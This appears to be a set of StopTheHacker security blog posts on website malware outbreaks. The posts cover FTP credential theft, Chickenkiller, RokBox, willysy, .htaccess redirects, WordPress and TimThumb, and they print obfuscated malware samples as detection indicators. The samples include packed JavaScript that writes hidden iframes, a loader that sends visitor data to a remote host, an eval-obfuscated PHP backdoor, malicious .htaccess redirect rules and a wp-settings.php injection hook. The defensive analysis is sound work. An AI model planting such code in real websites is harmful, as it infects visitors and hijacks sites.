This is the third part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

In this article, we will describe one of the most common reasons why benign websites are hacked and then are infected with malware: FTP password compromise. This particular technique is neither very sophisticated, nor is it recent, nonetheless, it is extremely effective.

It is estimated that near 30% of all websites that are injected with malicious computer code are the result of stolen credentials, such as FTP passwords. We will delve into some detail about FTP, how to protect yourself and your website from this kind of an attack, and alternate best practice strategies.

What is FTP?
File Transfer Protocol (FTP) is a protocol that specifies how to communicate with a computer, such as a web server, in order to access to the files on that computer. FTP is simply a set of rules according to which your computer can talk to a file server, web server or other computers and reliably exchange information.

This protocol, FTP, is based on another popular Internet protocol called Transmission Control Protocol (TCP). FTP is based on a client server model, wherein the computer that requests data is the client, and the computer supplying the data is the server. Both client and server understand how to “talk” to each other reliably using FTP.

How is FTP used?
FTP can be used for a number of purposes, one of the primary uses being for web-masters to upload web pages to web-servers. FTP in general can be used to easily move files from one computer to another. Academic institutions also use FTP to move large data files from experiments onto dedicated computers meant for storing information.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP etc).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website (2) infect visitors visiting the compromised website and more.

How do FTP credentials get compromised?
Credentials, such as FTP username and passwords, can be compromised by Trojans and viruses installed on the computers of unsuspecting users “sniff” the credentials being transferred over the Internet to the web server. FTP transfers credentials and information in clear-text. This means that any person or program that is “listening” in on the transmission of credentials to the FTP server, can do so relatively easily and then steal these credentials.

There is extensive literature on rootkits, sniffing software, and key loggers on the Internet. A popular Trojan called ZBot was analyzed by Prevx and details were released in this forum entry. This particular Trojan is installed from a number of vectors: Rogue Antivirus advertisements, spam emails, fake codecs, and more. This Trojan is very effective at stealing FTP credentials and passing them to a “master” server that injects malware onto the associated websites.

How are the FTP credentials used to infect websites?
Once a Trojan like the one described above acquires FTP credentials, they pass on the information to a master server called a “command and control” server. This command and control server could be present on an IRC chat channel, for example. Once the Trojan has stolen the credentials and notified the master server via the chat channel (automatically), the master server uses the credentials to infect the website with malware.

How to detect if your site is vulnerable to FTP credential compromise attacks?
If you use FTP for access to files on your website, you need to be very careful. If you store your FTP usernames and passwords on your local computer using software like FileZilla, your website can be compromised if malicious software or a Trojan is installed on your computer. Never store credentials on your local computer.

Additionally, you should use SFTP (Secure FTP), SSH (Secure Shell), or SCP (Secure Copy), which uses encryption, instead of FTP. Or, use another method that does not transfer credential information to your server in clear-text (using encryption instead) when communicating with your web server. This technique will avoid credential compromise from “sniffing” attacks.

Conclusion
FTP credential compromise is a common vector for malicious hackers to exploit and infect websites. We have seen what FTP is, how it is exploited by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

News, Report blackisting, ftp, malware, passwords, sniffing, trojan

Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

An example is present below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k1){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1)}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

This de-obfuscated code is easier to read:

function hDcd(data) {
        var b16_digits = "0123456789abcdef";
        var b16_map = new Array;
        for (var i = 0; i < 256; i++) {
            b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
        }
        if (!data.match(/^[a-f0-9]*$/i)) {
            return false;
        }
        if (data.length % 2) {
            data = "0" + data;
        }
        var ll = data.length;
        var result = new Array;
        var j = 0;
        for (var i = 0; i < ll; i += 2) {
            result[j++] = b16_map[data.substr(i, 2)];
        }
        return result.join("");
    }

    if (document.cookie.indexOf("cookieh=enabled") == -1) {
        document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
        document.cookie = "cookieh=enabled";
    }

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

These links all resolve back to a single IP address. As you can see, the IP address and host were created with a malicious intent. It is an example of a site that has been deployed specifically to spread malware.

IP address:	77.232.70.33
Hostname:	bl4ckh4x0rs.com

The malware has infected many sites including those below.

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security dean edwards packaer, iframe, malware, packer

Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63″ all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.

How should I protect my site
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklist, javascript, Joomla, malware, rokbox, RokBox.js, Wordpress

In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, domboware, dragosimport, malware

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

• osCommerce Remote Edit Site Info Vulnerability
• osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass

These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, iframe, javascript, malware, willysy

Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.

About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.

Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.

Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.

aquarigger
911docs
thefreeadforum
hqa-traffic
twilightparadox
googlexstat
pomorze
lixstats
legenica

How do I identify the malicious code
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.

This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.

<ifmodule>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
</ifmodule>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security htaccess, malware, redirection

As of November 21, 2011, a large number of posts on Google groups seem to have been replicated to some adult chat rooms on Google Groups. This seems to be an attempt to game the search engine algorithm that Google uses and gain high search rankings for adult, spammy and potentially malicious websites.

We have blogged previously about how malicious hackers misuse SEO mechanisms to direct traffic to their malicious websites:

• Why Did My PageRank Go Down? – SEO Poisoning

More discussion about this issue is taking place on Google Groups. We will present more details about this incident as we know them.

• Why so many GAE group posts are moved into “American-porn” group?

News, Report, Security google, googlegroups, hack, post

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below will appear at the top of the page in the section of a webpage. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

1. Access your hosting account SSH or SFTP
2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )
3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

What does the malware do?
Th injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security blacklisting, dean edwards, malware, packed, packer, Wordpress

Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.

The basic concept is as follows:

1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”

We have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.

How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.

script.php
cssminibar.js,
sidename.js,
jtoolsmini.js,
tempjs.js,
js.php,
jstools.js

What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

Maliciously registered sites related to this attack:

brkfnrmnk.co.cc
brlgnknc.co.cc

Maliciously registered sites related to previous Domain Chaining attacks:

klubnika34his.com,
bogdantevye.ru,
jwjmusic.cx.cc,
frankieeus.ru,
gaufridboris.ru,
stephanos.ru

The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:

nbnjkl.com/urchin.js

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security blacklisting, cssminibar, javascript, lizamoon, malware, sidename

The ability to integrate useful third party plugins into a CMS like WordPress provides website owners the ability to add new functionality to existing websites. Unfortunately, this feature comes at a price.

Third party plugins often have security vulnerabilities that allow malicious hackers to break into websites and use them to distribute malware. We take a look at a plugin called TimThumb in this article.

What is TimThumb?
TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is used widely on blogs and in other applications.

The Problem
The main script associated with TimThumb is called Timthumb.php. This program allows a website owner to offer the visitors to a website, the ability to load images and resize them easily, while at the same time maintaining a cache of images to preserve bandwidth and speed loading.

It is this functionality which has been a target of the zero-day TimThumb attack. TimThumb allows users to load pictures from external sites and store them in a directory on the web server, which is a really attractive vector for hackers to use in an attack. Keep in mind though, TimThumb does not play any part in executing malicious code. TimThumb is merely being used as a delivery mechanism for the malware.

Storing externally sourced content in a web server directory which is publicly accessible is the root cause of this issue. The verification mechanism for storage of content and verification of its source is flawed in TimThumb. This flawed mechanism has allowed malicious hackers to distribute malicious code from many websites.

A very good writeup on this topic is presented here.

Analysis
The malware runs each time the page is loaded by the website visitor’s browser. Malicious advertisements are displayed to the user and a malicious redirection may occur (sites we listed in our recent post).

• A malicious script is often deposited in the cache directory (used by timthumb to store cached images)
  • The malicious scripts may be a c99/c100 shell
  • The malicious shells are web based – giving the malicious hacker remote control of your website, and hosting account
• Base 64 encoded malware is injected into wp-blog-header.php
• JavaScript files may be modified (l10n.js and jquery.js are primary targets)

A sample of the injected code:

var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
eval (function (_0x2f46x1,_0x2f46x2

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security iframe, malware, timthumb, vulnerability